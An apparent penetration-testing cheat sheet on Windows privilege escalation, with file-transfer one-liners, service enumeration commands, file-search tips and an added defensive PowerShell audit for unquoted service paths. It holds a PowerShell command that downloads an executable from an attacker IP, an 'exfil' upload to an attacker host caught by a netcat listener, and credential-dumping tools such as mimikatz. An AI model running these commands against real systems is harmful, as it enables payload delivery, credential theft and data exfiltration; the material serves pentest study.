Windows Privilege Escalation

Only so many ways in to the pot of gold here.

A Good Place to Start

https://xapax.gitbooks.io/security/content/privilege_escalation_windows.html

http://www.fuzzysecurity.com/tutorials/16.html


FILE TRANSFER

Powershell

Quick tip: to get files across the line, use PowerShell.

Download

powershell -command (new-object System.Net.WebClient).DownloadFile('http://10.10.14.23:6000/some.exe','C:\Users\someuser\Documents\some.exe')

Upload / Exfil

powershell -command (Invoke-WebRequest -Uri <attackip:port> -Method Post -infile <file&location>)

On the receiving side, run nc listening on that port with its output redirected to a file to capture the upload.

TFTP

Server

atftpd --daemon --port 69 /tftp

Client

tftp -i <serverIP> get <file>

SMB Server

/usr/share/doc/python-impacket/examples/smbserver.py <sharename> /smbshare/

Good Reference: https://blog.ropnop.com/transferring-files-from-kali-to-windows/

PASSWORDS

fgdump.exe

mimikatz.exe

wce.exe

ENUMERATE

List services

net start

Unquoted service paths

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

Find Service executable paths

reg query "HKLM\System\CurrentControlSet\Services\<serviceName>" /v "ImagePath"
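The wmic and reg one-liners above list candidates; the script below, an added example that is not from the original post, goes a step further from the defender's side: for each auto-start service with an unquoted path containing a space, it lists the intermediate paths Windows would probe and reports whether a standard user could write to the directory involved, which is what makes such a path an actual finding rather than noise. Assumes PowerShell 3+ on the host being audited; the group list and the rights regex are my own choices.

```powershell
# Added audit script, not part of the original post. Remediation for any hit is to
# quote the ImagePath, e.g. sc.exe config <svc> binPath= "\"C:\Program Files\App\svc.exe\""
$writableGroups = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone')

function Get-UnquotedServicePath {
    Get-CimInstance Win32_Service |
        Where-Object {
            $_.StartMode -eq 'Auto' -and
            $_.PathName -and
            -not $_.PathName.StartsWith('"') -and
            $_.PathName -notlike 'C:\Windows\*' -and
            $_.PathName -match ' '
        }
}

function Get-ProbePaths {
    param([string]$PathName)
    # Drop service arguments: keep everything up to and including the first ".exe".
    $exe = if ($PathName -match '^(.*?\.exe)') { $Matches[1] } else { $PathName }
    # "C:\Program Files\My App\svc.exe" -> "C:\Program.exe", "C:\Program Files\My.exe"
    $parts = $exe -split ' '
    for ($i = 1; $i -lt $parts.Length; $i++) {
        (($parts[0..($i - 1)] -join ' ') + '.exe')
    }
}

function Test-WritableByUsers {
    param([string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory)) { return $false }
    $acl = Get-Acl -LiteralPath $Directory
    foreach ($ace in $acl.Access) {
        # Generic rights can show up as raw numbers; this regex only catches named rights.
        if ($ace.AccessControlType -eq 'Allow' -and
            $writableGroups -contains $ace.IdentityReference.Value -and
            ($ace.FileSystemRights -match 'Write|CreateFiles|Modify|FullControl')) {
            return $true
        }
    }
    return $false
}

foreach ($svc in Get-UnquotedServicePath) {
    foreach ($probe in Get-ProbePaths $svc.PathName) {
        $dir  = Split-Path -Parent $probe
        $flag = if (Test-WritableByUsers $dir) { 'WRITABLE BY USERS' } else { 'ok' }
        '{0,-30} {1,-55} {2}' -f $svc.Name, $probe, $flag
    }
}
```

Only rows flagged WRITABLE BY USERS need action; an unquoted path whose parent directories are admin-only is a hygiene issue, not an escalation.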

Files

The command below searches the C: drive for files created at "01/19/2013 06:38 PM" and writes the results to C:\FoundFiles.TXT.

@dir c:\*.* /s /t:c | findstr "01/19/2013  06:38 PM">c:\FoundFiles.TXT 

The command below runs the same search restricted to hidden files (/a:h) and writes the results to c:\FoundHiddenFiles.TXT.

@dir c:\*.* /s /a:h /t:c | findstr "01/19/2013  06:38 PM">c:\FoundHiddenFiles.TXT

TIPS

CMD Line Loop Through lines in file

for /F "tokens=*" %A in (myfile.txt) do echo %A

Note: the file name must not be quoted; in ("myfile.txt") makes for /F iterate over the literal string instead of the file's lines (quote it only together with the usebackq option). Inside a .bat file, write %%A instead of %A.

A few more references


REFERENCES
